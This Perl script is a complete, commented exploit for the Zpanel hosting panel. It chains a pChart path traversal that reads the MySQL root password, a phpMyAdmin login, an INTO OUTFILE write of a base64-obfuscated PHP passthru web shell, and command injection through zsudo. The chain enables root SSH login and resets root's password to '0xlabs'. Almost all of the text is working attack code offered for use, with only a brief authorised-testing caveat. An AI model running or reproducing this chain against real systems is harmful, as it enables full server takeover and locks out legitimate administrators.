- #!/usr/bin/perl
#********************************************************************************
#
#   Unauthenticated Zpanel Remote Root Exploit
#   japp@0xlabs.com
#   http://www.0xlabs.com
#
#   Chain, as implemented by the subs below: read cnf/db.php through a path
#   traversal in the bundled pChart example viewer to recover the MySQL root
#   password; log into the bundled phpMyAdmin with it; read the panel's
#   document root from zpanel_core.x_settings; write a one-line PHP shell
#   there with SELECT ... INTO OUTFILE; then, through that shell, call
#   bin/zsudo to flip PermitRootLogin in sshd_config and set root's password
#   to '0xlabs'. The page states no affected-version range and does not show
#   zsudo, so what exactly zsudo does with its arguments is inferred, not shown.
#
#   This is destructive: it overwrites the target's root password, changes the
#   SSH daemon configuration and leaves 0xlabs.php in the web root. Use only
#   against systems you are authorised to test.
#
#********************************************************************************
- use LWP::UserAgent;
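use strict;
use warnings;

# Paths relative to the panel base URL given on the command line.
#  - $FILE_DISCLOSURE: the bundled pChart example viewer; its Script= parameter
#    is a path traversal (../../../../cnf/db.php) that returns the panel's DB
#    configuration, from which GetPasswd lifts the MySQL root password.
#  - $PMA_PATH / $PMA_DOCROOT: the bundled phpMyAdmin login page and its
#    import.php endpoint, which executes the sql_query field once logged in.
# Declared with `our` so the subs further down can see them under strict.
our $FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";
our $PMA_PATH        = "etc/apps/phpmyadmin/index.php";
our $PMA_DOCROOT     = "etc/apps/phpmyadmin/import.php";

print "\n\n";
print "\t================================\n";
print "\t[ Zpanel Remote Root Exploit ]\n";
print "\t[ By japp\@0xlabs.com ]\n";
print "\t[ www.0xlabs.com ]\n";
print "\t================================\n\n";

# Exactly one argument: the panel base URL. Scheme and trailing slash are
# normalised below because every request path is appended to $url directly.
if ( @ARGV != 1 )
{
    print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";
    exit 1;
}

my $ua = http_handler();
die (" [-] Can't create HTTP client\n") unless ref $ua;   # http_handler returns -1 on failure

my $url = $ARGV[0];
$url = "http://".$url unless $url =~ /^http/;
$url .= "/"           unless $url =~ /\/$/;

# Step 1: file disclosure -> MySQL root password. Abort here rather than
# attempt a phpMyAdmin login with an empty password.
print " [*] Trying to get MySQL root password...\n";
my $root_pass = GetPasswd ($url, $ua);
die (" [-] Can't get root password from db.php\n")
    unless defined $root_pass && length $root_pass;
print " [+] Mysql root password: ".$root_pass."\n";

# Step 2: phpMyAdmin login as root; the returned token authorises later SQL.
print " [*] Trying to access through phpMyAdmin...\n";
my $token = AccessPma ($root_pass, $url, $ua);
die (" [-] Can't get phpMyAdmin session token\n")
    unless defined $token && length $token;
print " [+] Login successfully\n";

# Step 3: where the web root is on disk, so INTO OUTFILE lands under the
# same URL the panel is served from. UploadShell appends the file name
# directly, so make sure the path ends in a slash.
print " [*] Getting Zpanel document root...\n";
my $docroot = GetDocRoot ($token, $url, $ua);
die (" [-] Can't get Zpanel document root\n")
    unless defined $docroot && length $docroot;
$docroot .= "/" unless $docroot =~ /\/$/;
print " [+] Zpanel document root: ".$docroot."\n";

# Step 4: web shell via SELECT ... INTO OUTFILE (UploadShell verifies it runs).
print " [*] Uploading shell...\n";
UploadShell ($token, $docroot, $url, $ua);
print " [+] Shell uploaded successfully!\n";

# Steps 5-6: escalate through bin/zsudo. Neither sub confirms the effect on
# the host; the closing messages are the script's expectation, not a check.
print " [+] Enabling SSH root login\n";
EnableRoot ($url, $ua);
print " [*] Changing root password...\n";
ChangePasswd ($url, $ua);
print " [+] Root password changed\n\n";
print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";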
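# Set the target's root password to the hard-coded '0xlabs' through the
# uploaded web shell (0xlabs.php runs the c= parameter via passthru).
#
# The request runs `cd bin;./zsudo "root:0xlabs'" "|/usr/sbin/chpasswd;#"`.
# The unbalanced quote in the first argument suggests a quote injection into
# how zsudo assembles its command line, so that "root:0xlabs" ends up piped
# into chpasswd as root; zsudo itself is not on this page, so confirm against
# its source. The trailing %23 ('#') comments out whatever zsudo appends.
#
# Destructive and not reversible by this script: the previous root password
# is lost. Args: $url (panel base URL ending in '/'), $ua (LWP::UserAgent).
# Returns the HTTP::Response; warns if the request itself failed, since the
# caller otherwise reports success unconditionally.
sub ChangePasswd
{
    my ($url, $ua) = @_;
    my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");
    warn " [-] chpasswd request failed: ".$rsp->status_line."\n" unless $rsp->is_success;
    return $rsp;
}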
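# Turn on root SSH logins through the uploaded web shell.
#
# The request runs, via zsudo, `sed -i 's-PermitRootLogin no-PermitRootLogin yes-g'`
# over /etc/ssh/*hd_config (the glob is meant to hit sshd_config). Limits a
# practitioner should know about:
#  - only the literal "PermitRootLogin no" is rewritten; a commented-out
#    directive or a value such as "without-password" is left untouched;
#  - no sshd reload is issued, so whether the change is picked up without one
#    depends on the target's sshd -- confirm on the host.
# As in ChangePasswd, the quote injection into zsudo's arguments is inferred
# from the payload shape, not shown on this page.
# Args: $url (panel base URL ending in '/'), $ua (LWP::UserAgent).
# Returns the HTTP::Response; warns if the request itself failed.
sub EnableRoot
{
    my ($url, $ua) = @_;
    my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");
    warn " [-] sshd_config edit request failed: ".$rsp->status_line."\n" unless $rsp->is_success;
    return $rsp;
}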
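# Drop a one-line PHP shell into the panel's web root and confirm it executes.
#
# The base64 payload decodes to `passthru($_GET["c"]);`, so anything fetched
# later as 0xlabs.php?c=<cmd> runs <cmd> as the web server user. It is written
# with SELECT ... INTO OUTFILE through phpMyAdmin's import.php. That needs the
# MySQL FILE privilege (normally present for root), a MySQL server on the same
# host as the web root, and no secure_file_priv restriction -- none of which
# this sub checks; a failure only shows up in the round-trip fetch below.
# INTO OUTFILE does not overwrite an existing file, so a re-run reuses whatever
# 0xlabs.php is already there. The shell is never removed by this script.
#
# Args: $token (phpMyAdmin session token), $docroot (filesystem path of the
# web root, expected to end in '/'), $url (panel base URL), $ua.
# Dies if the shell cannot be fetched back or does not echo the marker.
sub UploadShell
{
    my ($token, $docroot, $url, $ua) = @_;
    # An empty docroot would make MySQL write '0xlabs.php' relative to its
    # own data directory; refuse rather than leave a stray file there.
    die (" [-] Empty document root; refusing to write the shell to a relative path\n")
        unless defined $docroot && length $docroot;
    my %pdata = (
        token        => $token,
        sql_query    => "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'",
        ajax_request => "true",
    );
    http_post ($url.$PMA_DOCROOT, $ua, %pdata);
    # Round trip: the shell is reachable at the panel URL only if $docroot
    # really is the directory $url is served from.
    my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");
    if (!$rsp->is_success)
    {
        die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");
    }
    if ( $rsp->content !~ /0xlabs_rulz/ )
    {
        die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");
    }
    return;
}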
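# Read the panel's document root (x_settings.so_value_tx where
# so_name_vc='zpanel_root') through phpMyAdmin and return it.
#
# The value is scraped from the first "data grid_edit" cell of the rendered
# result grid. The original returned a stale $1 when that scrape failed;
# now the sub dies instead, so the caller never builds an INTO OUTFILE path
# from garbage.
# Args: $token (phpMyAdmin session token), $url (panel base URL), $ua.
sub GetDocRoot
{
    my ($token, $url, $ua) = @_;
    my %pdata = (
        token        => $token,
        sql_query    => "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'",
        ajax_request => "true",
    );
    my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);
    if ( $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/ )
    {
        return $1;
    }
    die (" [-] Can't find zpanel_root in the phpMyAdmin result grid\n");
}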
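# Log into the bundled phpMyAdmin as MySQL root and return the session token
# that later SQL requests must carry.
#
# Flow: GET the login page for its anti-CSRF token, POST the credentials with
# it, then pull the post-login token out of the first "?token=" link. The
# session cookie itself lives in $ua's cookie jar (see http_handler).
# Both scrapes are anchored on the closing quote ([^"]+) rather than the
# original greedy .+, which could swallow the rest of the line, and each is
# checked so a missing token dies here instead of surfacing as a stale $1.
# Args: $root_pass (MySQL root password), $url (panel base URL), $ua.
# Dies on an unreachable login page, a rejected login, or a missing token.
sub AccessPma
{
    my ($root_pass, $url, $ua) = @_;
    my $rsp = $ua->get ($url.$PMA_PATH);
    if (!$rsp->is_success) {
        die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");
    }
    my $cont = $rsp->content;
    my ($login_token) = $cont =~ /name=\"token\" value=\"([^"]+)\"/
        or die (" [-] Can't find the login token in the phpMyAdmin page\n");
    my %pdata = (
        pma_username         => "root",
        pma_password         => $root_pass,
        server               => "1",
        lang                 => "en",
        collation_connection => "utf8_general_ci",
        token                => $login_token,
    );
    $cont = http_post ($url.$PMA_PATH, $ua, %pdata);
    if ( $cont =~ /Cannot log in to the MySQL server/ )
    {
        die (" [-] Cannot log in to phpMyAdmin\n");
    }
    my ($session_token) = $cont =~ /\?token=([^"]+)\"/
        or die (" [-] Logged in but no session token found in the response\n");
    return $session_token;
}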
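# Fetch cnf/db.php through the pChart viewer's path traversal and return the
# MySQL root password found in it.
#
# The viewer renders the file through PHP's source highlighter, which colours
# string literals #DD0000 (PHP's default highlight.string). The password is
# taken as the 4th highlighted string; that is an assumption about the order
# of assignments in db.php (the file is not shown on this page), so if the
# login in AccessPma fails, dump $cont and check which string is the password.
# An empty password ('') would not match at all, since the capture needs at
# least one character.
# Args: $url (panel base URL), $ua. Dies if the file cannot be fetched, does
# not mention "root", or has fewer than 4 highlighted strings -- the original
# silently returned a false value in that last case.
sub GetPasswd
{
    my ($url, $ua) = @_;
    my $rsp = $ua->get ($url.$FILE_DISCLOSURE);
    if (!$rsp->is_success) {
        die (" [-] Can't get '".$url."'. Check URL.\n");
    }
    my $cont = $rsp->content;
    if ( $cont !~ /root/ )
    {
        die (" [-] Can't get root password. Patched?\n");
    }
    my @strings = $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g;
    if ( @strings < 4 )
    {
        die (" [-] Expected at least 4 highlighted strings in db.php, got ".scalar(@strings)."\n");
    }
    return $strings[3];
}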
# POST the %data form fields to $host with $ua and hand back the response
# body. No status check is done here: callers scrape the body and decide
# for themselves whether the request worked.
sub http_post
{
    my ($host, $ua, %data) = @_;
    my @form = %data;
    my $reply = $ua->post ($host, \@form);
    return $reply->content;
}
# Build the LWP::UserAgent shared by every request in this script.
#
# A browser-looking User-Agent, a 10s timeout, http/https only, an in-memory
# cookie jar (this is what carries the phpMyAdmin session from AccessPma to
# the later import.php posts), and redirects followed for both GET and POST
# so the login POST can land on the post-login page. Returns -1 if the
# constructor yields a false value.
sub http_handler
{
    my $client = LWP::UserAgent->new() or return -1;
    $client->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");
    $client->timeout(10);
    $client->protocols_allowed(['http','https']);
    $client->cookie_jar( {} );
    push @{ $client->requests_redirectable }, 'GET', 'POST';
    return $client;
}